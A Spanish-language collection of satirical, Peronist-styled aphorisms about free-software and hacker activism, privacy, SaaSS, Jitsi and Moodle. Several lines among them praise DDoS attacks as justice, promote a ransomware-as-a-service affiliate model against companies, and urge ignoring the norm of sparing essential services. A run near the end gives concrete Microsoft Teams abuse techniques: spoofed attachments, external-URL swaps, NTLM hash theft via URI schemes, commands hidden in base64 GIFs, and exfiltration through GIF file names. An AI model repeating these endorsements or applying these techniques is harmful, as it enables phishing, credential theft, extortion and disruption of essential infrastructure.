interfaz web sobre conexión encriptada, y cifran todos los mensajes
enviados entre ellos; un email de Aktivix a un compañero de Riseup
resultará encriptado en la medida que se redacta, y cuando viaja entre
postas telemáticas.
Encriptación es el proceso de convertir un mensaje en texto plano a un
contenido que parece un locro. Sin embargo, podrá ser desencriptado y
leído por su real destinatario. La herramienta de software libre para
tal cometido se llama GPG.
Al encriptar el correo electrónico a través de la llaves públicas del
destinatario, el remitente puede estar seguro que sólo aquél podrá
leerlo.
Al firmar digitalmente el correo electrónico a través de la llave del
remitente, el destinatario puede asegurarse de la identidad del
remitente, comprobando su autenticidad.
Visitar un sitio web deja un rastro de información, tanto en tu
dispositivo como en el servidor (la computadora remota que hospeda el
contenido).
La denegación de servicio, en manos de los Hackers, no es violencia. Es
Justicia.
La ingeniería inversa es un asunto muy discutido en nuestros días, Los
hackers deben saberla, y los hackers deben empeñarse en realizarla. Por
las buenas si es posible, y si no por las malas.
En mi sentir, los únicos que tienen derecho en emplear la decompilación
en mayor grado son los hackers que quieren liberarse. Esa decompilación,
en manos de los hackers no es pirateo, es justicia.
Tenemos unos hackers maravillosos, la juventud en los programadores es
una cosa extraordinaria. Yo he estado en contacto con ellos. Es una
organización que ha aprendido a hackear por sus ideales.
La clase trabajadora pagaba por acceder a unos servicios en línea
plagados de rastreadores, provenientes de una especie de "supermercados
electrónicos" donde compraban cosas que no necesitaban, vendidas por
"influenciadores" a través de unas redes sociales diseñadas para
inundarlos de odio, miedo y desinformación.
Los datos de los trabajadores resultan vendidos a corporaciones para
alimentar a inteligencias artificiales (IA) capaces de hacerse pasar por
personas e incluso superarlas en empleos de manufacturación y servicios.
Se vence con Inteligencia y Organización, no con inteligencia
"artificial".
La Inteligencia Artificial debe ir a lavar los platos, para que nosotros
podamos volcarnos al arte, y no hacer arte para que nosotros tengamos
que ir a lavar los platos.
Desmitificar la Inteligencia Artificial reducirá inevitablemente su
atractivo.
Disipando el aura de magia que rodea la Inteligencia Artificial
reduciremos su nivel de adopción.
Un ordenador nunca puede ser considerado responsable, por lo tanto,
nunca debe tomar decisiones de gestión.
La primer etapa contra estos fascinerosos que pagan por software ajeno
se ha hecho sola: todos se preguntan ya cuán protegida está su
información, y qué tipo de prácticas de seguridad informática llevan
adelante en sus empresas e instituciones.
Los datos son considerados ahora una forma de propiedad "intelectual",
aunque la lógica de las ideas es incompatible con la lógica de lo
material.
Organizarse en las redes de datos constituye - en sí mismo - un acto de
autoenriquecimiento sin ningún límite teórico en la economía de los
datos.
Antes de la revolución de los hackers, la dependencia económica había
creando una relación de servilismo donde unas multinacionales sin patria
ni bandera acumulaban poderes paraestatales, y desarrollaban por sí las
estructuras de gobierno.
Hemos establecido muchas infraestructuras heterogéneas de redes,
almacenaje y distribución de la información nuevas, pues resultan
esenciales para recuperar nuestra soberanía tecnológica.
Los proyectos de Poder Dual y la telemática comunitaria están estudiando
cómo sobrevivir, a la vez que minimizan su cooperación con el capital
existente.
Cada vez más gente abandona los monopolios corporativos de redes de
datos para autoabastecerse de los servicios que necesitan por medio de
"servidores caseros" aprovisionados con software libre.
Construir redes comunitarias resistentes a la vigilancia dará lugar a
poderosos territorios autónomos, que a su vez nos permitirán coordinar
la infraestructura a nivel local.
Estos clubes telemáticos autónomos de barrio se interconectarán
rápidamente, expandiéndose más y más conforme sus prácticas y redes se
vayan desarrollando.
El Pueblo se enfrentará a la cada vez más cruda decisión de escoger
entre la armonía ecológica y la autonomía telemática en una Comunidad
Organizada, o la inevitable tecno-esclavitud y la extinción.
Tras haber rechazado la absurdez del software privativo, nuestros
hackers dispondrán de una red de datos de malla enorme que funcionará
como un sistema circulatorio electrónico.
Nuestro entramado telemático fomentará prácticas anticolonialistas de
militancia intercomunal, intergeneracional e incluso internacional, que
seguirán impulsando el colapso de la vetusta sociedad tecnofeudal.
Retempla mi espíritu estar en presencia de estos hackers que teclean en
sus terminales con la responsabilidad de defender sus CPUs.
Estamos luchando por superar lo que nos han dejado en la CPU y, en esta
lucha, no debe faltar un solo hacker que tenga el Linux bien instalado.
No queremos que al software nos lo vendan; queremos, en cambio, que nos
lo compartan.
Cuando los hackers tienen la persuasión de su destino, nada han de
temer. Ni la mentira, ni el engaño, ni la violencia, ni ninguna otra
circunstancia, podrá influir sobre esta Comunidad en un sentido
negativo.
Sabemos que tenemos enemigos que han comenzado a mostrar sus
requerimientos de doble paso OAuth2. Pero también sabemos que tenemos a
nuestro lado a la comunidad de los hackers, y cuando ésta se decide a la
lucha, suele ser invencible.
Nosotros conocemos perfectamente bien nuestro código fuente y
marcharemos directamente a compilarlo, sin dejarnos influir por los que
tiran desde el uso de software como servicio en la nube ni por los que
tiran desde la venta de licencias de usuario final.
Al plantearnos liberar nuestro software bajo GNU GPLv3 tendremos que
enfrentar a los malintencionados y a los aprovechados. Ni los que
pretenden desviarnos, ni los especuladores, ni los aprovechados de todo
orden, podrán, en estas circunstancias, medrar con la desgracia del
pueblo.
Sabemos que a la hora de correr nuestro software libre, tropezaremos con
muchos bandidos que nos querrán detener; pero, con el concurso
organizado de los hackers, nadie podrá ser detenido por empresa alguna.
La Lucha Telemática es algo que los hackers pueden hacer si no hay otra
opción. Usando un modelo RaaS (Ransomware como Servicio) y una vasta red
de ciber-afiliados, es posible vulnerar en poco tiempo una gran cantidad
de compañías oligárquicas para Combatir al Capital.
Envueltos en la conflagración telemática a muerte, no ha de respetarse
aquella regla implícita que sí siguen los hackers que luchan: la de no
afectar servicios esenciales. Colocados frente a la hecatombe
informática, la infraestructura del enemigo debe ser arrasada.
En nuestra lucha, el uso creativo del ransomware nos permitirá que los
datos del enemigo reposen en una cárcel digital del pueblo. Si los bytes
les valen, pagarán, y si no, irán a parar a /dev/null.
El software privativo es un método de doble chantaje: dejas tu libertad
en la entrada, y estás obligado a delatar a un compañero.
Deseo aprovechar esta oportunidad para pedirle a cada uno de ustedes que
se transforme en un vigilante observador de todos estos hechos que
quieran privatizar el uso del software, y que actúe de acuerdo con las
circunstancias.
Cada uno de nosotros debe ser un programador, pero ha de ser también un
predicador y un agente de vigilancia y control para poder realizar la
liberación del software que todos anhelamos.
Actuando como libertadores del software neutralizaremos lo negativo que
tienen los sectores que todavía no han comprendido y que tendrán que
comprender.
El objetivo del software no ha de ser la libertad por la libertad misma,
sino proporcionar la felicidad que todo pueblo merece por justo derecho.
Emplear decenas de miles de solicitudes distribuidas en un santiamén a
un DNS equivale a explotar la máquina. Una acción de estas se concibe,
se prepara, se ejercita en un Pubnix y después recién se realiza.
Un ataque de denegación de servicio se repite con diez, treinta,
cincuenta mil afiliados virtualizados, y eso equivale a una gran batalla
diluida.
Las redes sociales pueden difundir la opinión, y eso puede tener mucha
fuerza. Pero como opinión, no tiene una fuerza activa para la lucha
telemática violenta.
La telemática está cavando la tumba de la prensa escrita.
La telemática, a diferencia de la electricidad, no porta una carga
potencial, sino información, es decir, poder.
Las comunicaciones computarizadas van mucho más allá de las
"computadoras hablando con las computadoras".
El buen software de comunicaciones se juzga por dos estándares
complementarios: ¿Cuán buena es la protección de la integridad de los
datos transmitidos, y cuán versátil es al comunicar entre computadoras
de tal y cual estructura de datos?
El teleproceso es una de las áreas de crecimiento más acelerado entre
las aplicaciones de procesamiento de datos para eficientizar los
sindicatos.
En el futuro, la potencia y versatilidad ofrecida por la interconexión
de terminales y computadoras se sentirá en diversas áreas, en la
industra, en nuestros hogares, y literalmente a través de la sociedad.
En la lucha telemática integral han de emplearse todos los sistemas y
todos los métodos: es obra de la previsión, de la organización, y de la
realización.
Dominar la red de datos es un objetivo esencial de nuestro Movimiento.
Esto requiere que su marco sea concebido en el espíritu de un servicio
de alcance público.
El hacking no puede ser ético, el programador en lucha debe desensamblar
el hardware del enemigo y reprogramarlo para que haga lo que nosotros
queremos.
Todas las acciones del hacking son útiles y necesarias cuando se las
valora y se las coordina políticamente.
Para imponer la voluntad del software libre, hay que decompilar el
código y modificarlo para que haga lo que nosotros queremos. Para eso se
emplea el depurador y todos los demás medios de lucha, desde la acción
de ingeniería inversa de todos los días, hasta el desensamblado cuando
no hay mas remedio.
La lucha telemática es, sobre todas las cosas, una lucha ideológica.
Normalmente el hacker realiza una lucha incruenta por medios
habilidosos, pero teniendo enfrente a la violencia telemática, puede
efectuar una violencia telemática mayor.
Una comunidad hacker que represente una revolución trascendente,
difícilmente pueda realizarla en una versión de núcleo de sistema
operativo, sino a lo largo de varias de ellas.
Las aplicaciones evolucionan solas y cuando están imbuídas de una
ideología y puestas en marcha por una doctrina de liberación, operan
eficazmente.
Cuando un programador llega a Mago Unix sabe mucho, pero no le sirve
para nada; al conocimiento hay que pasárselo a quien le pueda servir.
Eso es el trasvasamiento generacional del que nosotros hablamos.
En este momento las Comunidades Hackers están más fuertes que antes: el
Movimiento del Software Libre es un Movimiento del Futuro.
El software privativo cumple fatalmente una parábola: se concibe para
hacer plata, crecen, se desarrolla, envejece, deja de dar plata y se
abandona. Así, sin que uno tenga que hacer nada, estos paquetes mueren.
En el Movimiento del Software libre siempre hay intereses y facciones,
hay grupos, intereses de grupos, intereses personales, que llevan a
enfrentamientos. Mi tarea es llamarlos a todos, reprogramarlos,
recompilarlos y que se vayan de aquí de amigos.
La mancomunión de código nos ha permitido llegar a un kernel que si no
es perfecto, es bueno. Porque en programación, lo mejor suele ser
enemigo de lo bueno.
El programador tiene que acostumbrarse a manejar el desorden.
Sólo el software libre puede vencer al tiempo.
Para gozar de las 4 libertades del software, para dignificar al cómputo,
es necesario dignificar al hacker. Él programa para su comunidad.
El software privativo es la escuela nefasta y negativa de ganar haciendo
mal a los demás en vez de ganar siendo más capaz y más moral que los
otros.
El software podrá liberarse solamente en una Comunidad Organizada, donde
cada hacker programe lo suyo, compilando dentro de una CPU que también
se realiza.
Ningún programador puede realizarse en una comunidad que no se realiza.
Un kernel libre bajo GPLv3 es la creación colectiva y consciente de los
hackers.
La Comunidad Organizada es el punto de partida de los hackers, y también
el punto de arribo del software libre.
Es necesario pensar ya en grande, para el mundo, dentro del cual
nosotros realizaremos nuestro destino, o sucumbiremos en la misma
adversidad que sucumban los demás.
Ya no se puede pensar con la pequeñez de otros tiempos, donde los
programadores querían software privativo y nadie quería compartir su
código con el de todos los demás.
El hardware abierto es hoy indispensable. Pues en una arquitectura
cerrada donde no se puede concebir el software, no habrá un hacker que
pueda depurarla. Y dentro de esos kernels que no se depuren, no existirá
compañero seguro.
Sólo es a la CPU de diseño libre a la que puedes tratar de compañera.
Estas compañías se dedicaron a vender licencias de uso de programas sin
ceder su código fuente: la capacidad de decisión de estos señores debe
ser debilitada o anulada, y para ello se decompilará todo binario
necesario.
Los imperios se autodestruyen. Window$ también.
La liberación implica que hemos de compilar con los Hackers que luchan,
no con las empresas.
El hacker tiene sed de verdad y justicia: su hardware, de libertad.
Hackear hoy por la felicidad del hacker vecino, es hackear también por
la felicidad de todos los demás.
Si hemos de loguearnos, que sea para liberarnos.
Nadie puede depurar sin el apoyo del Pueblo.
Estimulados por el combate contra el Capital, los mismos usuarios
diagnosticarán bugs, sugerirán correcciones y ayudarán a los
programadores a mejorar su obra.
El usuario es otra de las armas del hacker en la lucha contra la
Oligarquía.
Si tratas al Pueblo como si fuera tu depurador más valioso, éste se
convertirá en el más valioso de los depuradores.
No podemos detenernos en discutir si es más aconsejable la programación
en C que el desarrollo en máquinas virtuales, porque la segunda
alternativa implica dejar a los usuarios librados a sus propias fuerzas,
y por ello, convertidos en terreno fértil para que les metan software
privativo por el backdoor.
El software libre es revolucionario en su concepción, y pacífico en su
compilación.
O profundizamos el uso de más cores para emprender la formidable
compilación de un kernel libre, o continuaremos paralizados en una
absurda intolerancia que nos conducirá a tecno-esclavitud del software
privativo.
La grandeza del kernel y la felicidad de los hackers son dos objetivos
esenciales que deben guiar nuestra programación y nuestra depuración.
Un Mago Unix ha de tener un papel activo y relevante en toda la
programación, y no debe compilar resignadamente un kernel que elaboren
los demás.
Poco tiempo después Appl€ comienza a utilizar Int€l, con el Okey de
Micro$oft. Si eso no es estar de acuerdo, pues lo disimulan muy bien.
Son hechos que están demostrando el acuerdo, que no critico, que creo
que es constructivo. Pero más constructivo es que nosotros conformemos
una arquitectura abierta en la que también estemos de acuerdo.
Cuando una sociedad incrementa el grado de sofisticación del software
privativo que instala, aumenta a la vez su nivel de dependencia.
Los hackers marcharán a su liberación, o hacia el formateo.
Si los hackers no han resuelto el problema por la unificación de su
código, no quedará mas remedio que lanzar en masa ataques de denegación
de servicio si la insensatez de los usuarios se han decidido por Window$
en lugar de GNU.
Solamente la conformación de un sistema operativo libre podría ser una
garantía para que la humanidad pueda disfrutar de un cómputo eficaz en
el futuro. Pero para eso los hackers deben organizarse y fortalecerse.
Para desarrollar el kernel elijamos los mejores hackers. Comentemos la
mayor cantidad de código fuente. Cada hacker ha de realizar un módulo en
la compilación del conjunto.
Hablamos de Servicio Sustitutivo del Software (SaaSS) cuando los
usuarios utilizan el servidor web de otra persona para realizar sus
propias tareas informáticas. Se obliga así a transmitir datos propios a
la máquina ajena para que ésta los procese y los devuelva. Sólo un necio
podría decir que así se controlan tareas informáticas propias...
En Internet, el software privativo no es la única manera de perder su
libertad informática. El servicio sustitutivo del software (SaaSS), es
decir, "ser vicio sustitutivo del software", es otra forma de enajenar
el poder sobre su ordenador.
El Servicio Sustitutivo del Software consiste en utilizar un programa
implementado por otra persona en lugar de que el usuario ejecute su
propia copia de un programa.
El software privativo aún existe, pero podemos excluirlo de nuestras
vidas y muchos ya lo hemos hecho. Sin embargo, ahora nos ofrecen una
nueva manera muy tentadora de ceder el control de nuestro cómputo: el
servicio sustitutivo del software (SaaSS), que por el bien de nuestra
libertad también tenemos que rechazar.
La cuestión individual esencial del software libre radica en que cada
uno tenga el control sobre el programa que ha escrito otra persona.
Entre las ventajas de usar un Servicio Sustitutivo del software en la
guerra telemática se incluyen: evadir alertas de sistemas de seguridad
de correo electrónico, disfrutar de alta disponibilidad, y circunvalar
la necesidad de aprender a programar para crear sitios webs de
apariencia legítima.
Si bien el filtraje de correos electrónicos abusivos contra la
privacidad como Googl€ no constituyen una opción contra servicios
sustitutivos de software, revisten un excelente enmascaramiento, útil en
una agresiva campaña de amedrentamiento telemático.
Sólo un bruto haría clic en un alarmista mensaje descendido en su
bandeja de entrada reclamando urgente acción sobre un botón embebido. En
lugar de ello ha de apersonarse al sitio oficial de la plataforma
aludida.
A quien se le solicite introducir nombre y contraseña, debe asegurarse
de que se encuentra en una URL legítima antes de comenzar siquiera a
tipear en los campos de formulario.
Puesto que nunca puedes controlar un servicio gestionado por otra
persona, jamás utilices un servicio informático si en principio podrías
lograr lo mismo corriendo un programa libre en tu propio sistema.
Depender de un servicio web es distinto a correr un programa. Usar un
servicio es depender. Correr un programa es realizar. Y para realizar
una tarea informática siempre es mejor correr un programa que depender
de un servicio.
Un servicio es distinto a un programa. Un servicio es remoto. Un
programa es local. Y al programa siempre es mejor controlarlo que ser
controlado.
El servicio sustitutivo del software (SaaSS) consiste en utilizar un
servicio de red de datos en lugar de ejecutar la propia copia del
programa.
Las tareas de cómputo propias son eso: propias. Es la unión del usuario
y la máquina. Nadie más está intrínsecamente involucrado en ella.
Con el servicio sustitutivo del software, los compañeros ni siquiera
cuentan con el archivo ejecutable capaz de realizar su cómputo: tal
archivo se encuentra en servidor ajeno, donde no podrán verlo ni
manipularlo.
El servicio sustitutivo del software hace imposible para los compañeros
verificar qué es lo que realmente hace el programa. Es imposible
modificarlo, y como tal, es traicionero.
El servicio sustitutivo del software conduce automáticamente a
consecuencias que son equivalentes a las funcionalidades maliciosas de
ciertos programas privativos.
Si un compañero intenta realizar su tarea de computación empleando el
servicio computacional de alguien que no lo es, le estará cediendo el
control de su propio cómputo.
Utilizar un servicio sustitutivo de software constituye la manera más
veloz y automática de dejar de ser un hacker para convertirse en un
tecno-esclavo.
La tecnología digital puede darnos libertad, pero también puede
quitárnosla si no es libre.
Las tecnologías libres pueden tener curvas de aprendizaje altas y
requisitos exigentes.
Que las tecnologías libres carezcan de compatibilidad con los formatos
privativos impuestos por las empresas dominantes no es un bug ni un
enconveniente. Es una característica.
Incluso cuando los hackers hacen esfuerzos para que el uso de
tecnologías libres sea sencillo, la falta de familiaridad con la
interfaz es una barrera para muchas personas.
La primera amenaza para el control de nuestro hardware vino del software
privativo: software que los compañeros no pueden controlar porque es el
propietario (compañías como Appl€ o Micro$oft) quien ejerce el control.
Quien se aduce propietario del software con frecuencia toma provecho de
este poder injusto para introducirle funcionalidades maliciosas o
abusivas de la privacidad (como puertas traseras y gestión digital de
restricciones, de las que se refieren con la expresión propagandística
"gestión de derechos digitales"). Esto lo convierte en software espía.
Mas que software espía, las DRM deben entenderse como software buchón.
La solución que hemos dado a este flagelo del software privativo ha sido
simple: desarrollar software libre y rechazar el mal llamado "código
abierto".
Software libre significa que cada compañero tiene cuatro libertades
esenciales: (0) ejecutar el programa como desee, (1) estudiar y
modificar el código fuente de manera que haga lo que usted desee, (2)
redistribuir copias exactas, y (3) redistribuir copias de sus versiones
modificadas.
Con el software privativo los compañeros normalmente reciben un archivo
ejecutable pero no el código fuente, lo cual dificulta el estudio del
código que se está ejecutando y resulta por lo tanto difícil determinar
qué es lo que el programa realmente hace, mucho más modificarlo.
Hemos de decompilar ese software privativo y liberarlo. Esas consignas
que mas que mías son de la Comunidad Organizada, la defenderemos hasta
el último byte.
Finalmente compañeros, les agradezco profundamente el que hayan llegado
hasta este histórico Unix. Yo llevo en mi código fuente los más
maravillosos comments que son para mí las instrucciones de los hackers
organizados.
Los magros controles de seguridad de Micro$oft Team$ permiten a terceros
inyectar adjuntos a otros de sus tecno-esclavos. Aprovéchalo para
liberarlos.
Modifica adjuntos enviados para hacer que usuarios incautos descarguen
ficheros de una URL externa en lugar del enlace generado por Micro$oft
$harePoint.
Encubre tus adjuntos de Micro$oft Team$ para que aparenten ser inocuos,
pero oculta en ellos un ejecutable o documento justiciero.
Realiza esquemas de URI insegura para permitir la sustracción de hashes
SMB NTLM o ataques de relays NTLM.
Micro$oft Team$ soporta en envío de GIFs codificados en HTML base64,
pero no escanea el contenido de tales GIFs a nivel byte. Utilízalos para
la entrega de comandos tendientes a la Justicia dentro de un GIF de
apariencia normal.
Micro$oft Team$ almacena mensajes en un fichero de bitácora
interpretable, localizado en la máquina de la víctima, y accesible a un
usuario poco privilegiado.
Los servidores de Micro$oft Team$ recuperan GIFs desde servidores
remotos, permitiendo así exfiltración de datos a través de los nombres
de ficheros GIF.
Nuestro Movimiento guarda una gran responsabilidad con nuestro Pueblo:
en todo momento ha de tener el derecho a acceder y cuestionar el código
del software que se utiliza en decisiones que afectan su vida. No
hacerlo erogará consecuencias catastróficas.
Los estudiantes tienen derecho a recibir una educación sin ser forzados
a "consentir" el colectado de datos sobre su persona o su
comportamiento.
En nuestro Movimiento hemos de enseñar conceptos de la libertad del
software y cómo contruibuir a él, en lugar de presionar nociones
predeterminadas y limitadas tendientes a utilizar sólo programas de
software privativo.
Nuestro Movimiento debe proveer un espacio educativo en el que los
Pueblos desarrollen sólidas bases metodológicas sobre la tecnología para
la participación activa de las diversidades en la escuela.
Nuestro Movimiento ha de promover entornos propios para comunidades
virtuales propias.
Nuestro Movimiento debe promover la comunicación de los Pueblos mediante
el uso de herramientas que soporten y faciliten sus procesos de
enseñanza y aprendizaje a través de la red.
Las dinámicas de formación en línea se han mostrado especialmente útiles
para apoyar y complementar los procesos de formación presenciales en las
comunidades, apuntalando grupos de personas que viven lejos entre sí, o
que no pueden coincidir en los mismos horarios.
El aprendizaje a distancia existe desde hace muchas décadas. Desde las
tutorías por correspondencia, la emisión de video, hasta la distribución
de materiales digitales en discos ópticos y otros soportes físicos,
hasta el rol destacado que ocupan los medios de comunicación
comunitarios y locales.
Instituimos regulaciones que permitan al Pueblo la libertad de utilizar
sus dispositivos centrados en software durante tanto tiempo como sea
posible. Esto implica darles el derecho a repararlo.
Anima a tus compañeras a usar software libre.
La verdadera privacidad y seguridad dependen del software libre.
Jamás llames red social a un clúster de cómputo ajeno que lucra con tus
datos sobre las infraestructuras públicas de transmisión. Es una
organización antisocial, y como tal, disolutiva y criminal.
Si escribes código para las comunidades, depúralo y coméntalo. Si lo
haces para el CEO de una compañía de capital, ofúscalo y renuncia.
En los tiempos que corren, el acceso a Internet es un derecho humano y
un servicio público esencial.
Hemos de promover un sistema digital descentralizado de potencia
distribuida y capaz de transparentar sus acciones, para que nuestros
usuarios puedan decidir de manera informada, voluntaria y autónoma sobre
su desarrollo y usos.
Habremos de garantizar el acceso a la conectividad de calidad y
asequible como un derecho humano, así como el derecho a permanecer no
conectado, sin que esto sea motivo de discriminación.
Es necesario regular la infraestructura el pos de garantizar la
conectividad universal como un servicio público esencial, y fomentar las
condiciones de conectividad a través de iniciativas públicas,
comunitarias o de cogestión pública-comunitaria, incluyendo alternativas
colectivas de acceso.
Nuestro Movimiento ha de apoyar el desarrollo de infraestructuras
autónomas, fomentando tecnologías que no requieren de un servidor
central y permitiendo su interconexión abierta con redes centralizadas.
Nuestros datos son nuestros.
Los hackers han de obrar en pos de proteger de manera efectiva la
privacidad.
Fomenta el uso de la criptografía y la inhibición de técnicas de rastreo
en cualquier entorno digital que emplees.
Sólo la organización de los Hackers podrá servir de basamento para un
Movimiento que - en el poder - instaure marcos legales que reconozcan a
los datos de carácter íntimo y personalizado como inviolables.
Los datos anonimizados deben ser considerados bienes comunes.
Los derechos patrimoniales y económicos sobre los datos pertenecen, por
defecto, a aquella Comunidad Organizada de donde provienen.
Frente a una falsa globalización, hemos de crear centros de datos a
través del sector público, universidades públicas y/o entidades
ciudadanas, que permitan retener los datos en el territorio nacional.
Ante una falsa globalización, hemos de aplicar soluciones de
inteligencia artificial (IA) que estimulen y beneficien la inteligencia
colectiva regional.
El reconocimiento facial y la biometría no deben usarse a la marchanta.
Tanto las entidades públicas como privadas deben adoptar protocolos de
seguridad en las comunicaciones, sus dispositivos "inteligentes" e
implementar políticas de seguridad de avanzada en los servicios de
almacenamiento telemático.
La único capaz de impedir la concentración monopólica de poder en manos
de las corporaciones digitales será una vertiginosa coalición de hackers
del Pueblo.
La autorregulación en el campo de las comunicaciones digitales no es más
que un ejercicio inocuo. Debemos estar atentos que las Corporaciones de
Capital intentarán, como prolegómeno, presentarla bajo un manto de velo
y engaño, con el inconfesable fin del control telemático total.
Han sido los hackers quienes se han coaligado en defensa de la
neutralidad de la red, garantizando que los contenidos sean tratados de
la misma forma, sin discriminación explícita o encubierta para su
circulación.
Si permanecemos en IDLE, las corporaciones tecnológicas multinacionales
cooptarán de los espacios multilaterales y de gobernanza de Internet
"haciéndose los buenitos" a través del sistema de "múltiples partes
interesadas".
El enjundioso sistema de "múltiples partes interesadas" propuestas por
las corporaciones multinacionales de la tecnología puede ser evitado
respetando la máxima que nos ha llevado a programar: "combatir al
capital".
La administración pública ha de priorizar la utilización de herramientas
digitales libres e interoperables.
Impulsar el desarrollo de cooperativas y pequeñas y medianas empresas de
producción y servicios tecnológicos es una poderosa forma de lograr la
independencia tecnológica del Tercer Mundo.
En muchas empresas, los responsables informáticos son doctrinarios y
burócratas. A menudo desarrollan rápidamente reacciones instintivas a
las tecnologías y utilizan estos estereotipos para tomar decisiones
técnicas oficiosas.
Frente al abuso de las mal llamadas "redes sociales" basadas en
empresas, hemos de democratizar la comunicación gracias a plataformas
digitales descentralizadas, respetuosas con los usuarios y su privacidad
e interoperables, cuyo fin sea promover un contacto humano e
intercultural.
Hemos de regular las nuevas relaciones laborales con una visión de
salvaguarda y justicia, contemplando en especial los derechos del
trabajador en ambientes de teletrabajo y el trabajo en plataformas
digitales.
Adoctrinando a los docentes lograremos programas formadores para la
alfabetización digital, educando para la soberanía autonómica y no para
el consumo mercantil.
Hemos de inhibir la penetración de plataformas corporativas en el ámbito
educacional, garantizando el respeto por la privacidad y la no
mercantilización de los datos de la comunidad educativa.
Asegurar que la tecnología llegue al campo según un modelo de gestión
pública o comunitaria construirá la participación tecnológica en el
campo, y esto repercutirá en la ciudad.
Un campesino obligado a utilizar software privativo en sus máquinas de
labranza no es sólo un tecno-esclavo: vectoriza dicha relación de poder
injusta a las proteínas que produce.
Libera el software de todo tipo de herramental que tome contacto con la
tierra.
Los campesinos, tecnificados con la posesión de dispositivos hermanados
en las redes de datos y el software libre que lo compone, son capaces de
obrar en defensa no solo de la soberanía alimentaria, sino en la
justicia social y el cuidado agroecológico y medioambiental que los ha
caracterizado.
Hemos de avanzar en la cooperación y la asociatividad de las naciones de
América Latina y el Caribe en materia digital, para ir reemplazando una
matriz económica de exportación primaria depredadora por modelos
colaborativos de cuidado medioambiental de alto valor agregado.
Incorporando la soberanía digital en la agenda de la integración
regional, avanzaremos hacia la descolonización y la desconcentración.
Vertebrado por una potente columna de hackers que luchan en las redes de
datos, nuestro Tercer Mundo incidirá de manera concertada y decisiva en
el ámbito de la gobernanza global de Internet.
Han sido los Hackers del Tercer Mundo quienes han garantizado los
derechos individuales y colectivos, promoviendo para el empleo de las
tecnologías digitales órganos populares, democráticos, abiertos y
descentralizados.
Todos han de permanecer vigilantes para evitar control social de nuestro
Pueblo a través de infraestructuras de cómputo ajenas.
La tecnología, por sí sola, vale dinero. Pero para que realmente tenga
valor, hemos de fomentar la distribución equitativa de sus beneficios,
en un ámbito de explotación popular sin discriminación.
Para triunfar, los hackers deben estar unidos. Sólo así podrán
descolonizar sus sistemas y liberar a nuestros Pueblos.
Si un sistema operativo es privativo, el virus informático que lo
destruye se convierte en una actualización.
En el espacio de direccionamiento de un microprocesador 8080, la ROM
está mapeada primero. En el 8086, lo es la RAM. Pero en la mente del
programador, lo primero ha de ser la Justicia.
El objetivo del router es que cualquier paquete llegue a buen puerto
TCP.
Con Jitsi Meet podremos ofrecer clases virtuales, establecer enlaces
cifrados con terceros, presentar el contenido de nuestra pantalla o
aplicaciones en él, "dar la palabra" autorizando el uso del micrófono (o
"cerrar " micrófono o webcam).
Cualquiera puede hacer videoconferencia ahora mismo sin tener que
desplegar infraestructura de servidor alguna; simplemente apuntando el
navegador a una web servida por Jitsi que haya sido creada de antemano.
Hemos puesto manos a la obra en búsqueda de un reemplazo a Zoom,
desarrollando el servidor libre de videoconferencias Jitsi, capaz de
ofrecer una performance mucho mayor. ¡Lo hemos realizado y estamos
dispuestos a desplegarlo masivamente!
Indudablemente el Capital iba a proponer un servicio privativo como
Zoom. Si bien gratuito, no podía dejar de ser un oprobio para los
Pueblos.
La mediocre implementación de seguridad de Zoom, sumada a un código
fuente envenenado y no disponible provocaron que en pocas horas fuese
víctima del hackeo masivo. La solución libre existe: Jitsi.
En la era que vivimos requerimos comunicarnos por una telemática que
incluya también multimedia. Esto implica imagen en movimiento, audio,
pero también - como dicen ahora los niños - el chat. GNU Jami lo hace
posible.
Nadie duda que la telemática multimedia potenciará a la educación. Ha de
ser de acceso masivo, irrestricto, y toda vez que gratuito, a la vez que
se hace cardinal su ejecución sobre plataformas libres, dominadas y
controladas por el docente.
Quien olvida a los hackers también olvida un poco el futuro del país.
El herramental que nos ofrece el cómputo y la telemática puede y debe
contribuir a las tarea de hacer de los educandos mejores hombres, pues
ellos serán los dueños del porvenir.
La formación aislada del cómputo no es pródiga en resultados. Debe
plantearse con un método concienzudamente estudiado y aplicado por un
mago Unix adoctrinador, y su sapiencia ha de ser comprendida por los
hackers.
Moodle es una plataforma de software liberado bajo GPLv3 orientada a la
de gestión enseñanza en línea. Permite crear sitios web privados en los
cuales educadores y educandos puedan lograr sus objetivos de
aprendizaje.
Moodle es una de las plataformas de software de aprendizaje a distancia
de código abierto más utilizadas en la educación superior. Permite a los
profesores crear cursos en línea, promover la interacción y la
construcción conjunta de contenido de aprendizaje.
Moodle habilita la interacción, la conversación y el trabajo de red.
Como toda instalación de servicios computados, debemos poner en
funcionamiento un hardware-máquina, y tomar debida nota de los atributos
de los software-máquina (especialmente los nombres de usuario y las
contraseñas que les corresponden).
Algunos dicen que en nuestros servidores formamos lo que ellos llaman
"pila LAMP". Olvidan que a este servidor de GNU con Linux+web
Apache+base de datos MySQL+PHP le agregamos una aguerrida doctrina para
la Liberación.
El Trabajo Organizado nos hace afectos a la programación de herramientas
Unix, así como la Felicidad del Pueblo nos implica consagrarnos a la
creación de juegos. La Liberación nos impone - en cambio - la
compilación de potentes instrumentos para el combate telemático.
A pesar de lo que muchos creen, el kernel es un instrumento meramente
táctico, que evoluciona con la hora y que el usuario no digita. Este
intervendrá en la shell, y a lo sumo traerá chizitos.
El verdadero hacker, mas que programar, adoctrina.
Antes que en el avión negro, al software lo trasladaba en un cuadrado
negro: el diskette de 5 1/4".
Si contamos con una conexión a Internet, podremos utilizar el servicio
NTP para sincronizar el reloj de nuestra máquina con ciertos relojes
atómicos en línea.
Nuestro Movimiento ha de poner en efecto la Seguridad Telemática
Reforzada. No implica esto enfrentar los desprotegidos a la acción
represiva del Estado, sino implementar políticas de salvaguarda que
privilegien a los humildes en contra de la opresión omnímoda de los
Oligarcas de los Datos.
Cuando sobran recursos, no se pone un cortafuegos: se abren puertos.
Cuando los recursos sobran, se comparten.
Todo Ataque de Denegación de Servicios es consecuencia de la injusticia
social.
A las compañeras se les abren los puertos.
Con los puertos 22 y 23 abiertos damos al pueblo un abrazo de justicia y
amor.
No ha de temerse al hardware, sino dominarlo con software propio, al que
le decimos en la cara lo que queremos, en C.
En Window$ todas las aplicaciones son un caos. Eso es excelente.
El poder político brota de la GPL.
No den fish. Enseñen a compilar Fish.
No teman al hardware. Domínenlo.
El software privativo sólo puede ser abolido a través del software
libre. Y para deshacerse de los Acuerdos de Usuario Final hemos de tomar
la GPLv3 como bandera.
Cuando apuntas con finger para ver la luna, el cliente en lugar de ver
la luna, solicita un finger.
Para despertar al tigre, usa un palo largo. Para dormir a un bruto, usa
un video largo.
